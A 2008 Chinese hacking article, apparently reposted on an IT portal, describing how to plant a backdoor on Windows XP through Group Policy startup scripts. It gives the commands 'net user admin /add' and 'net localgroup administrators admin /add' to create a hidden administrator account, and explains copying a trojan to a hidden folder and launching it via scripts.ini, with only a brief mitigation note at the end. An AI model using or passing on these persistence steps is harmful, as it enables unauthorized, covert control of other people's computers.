换个角度 开启后门的另一个思路
2008-02-23 06:57:18来源:互联网 阅读 ()
1、组策略启动脚本
利用过程:启动组策略(运行->gpedit.msc->计算机配置->Windows 设置->脚本(启动/关机) )
2、启动与关机相关设置
选择启动->属性->添加,会弹出选择脚本名。选择程序 C:\windows\system32\net.exe,参数 user admin /add 来执行 net user admin /add。再同样添加C:\Windows\system32\net.exe localgroup administrators admin /add来执行 net localgroup administrators admin /add。
费话少说: 再经过进一步了解的时候发现这里是由C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\scripts.ini(PS:默认是隐藏的。)来控制 shutdown 和 Startup 的。
ini组成方式如下:
|
也就是说 scripts.ini 控制着整个启动,就如同以前 win.ini 一样。
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup\ 启动文件的目录,那样脚本名路径就可以不用加详细目录名了。
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\shutdown\ 关闭文件目录,同上。
思路就这样,copy 后门到非常隐藏的目录,再加个启动脚本参数,实现木马启动。
解决此缺陷的方法:组策略->计算机配置->管理模板->系统->脚本,相应的禁止就行了。
或者来招毒的,彻底禁止掉这个:把scripts.ini 对应用户权限全部删除,system administrators 全部取消,就没人能访问了。
以上在 Windows XP SP2 均已测试成功。
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
上一篇:黑客进入服务器隐藏自己的方法
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash
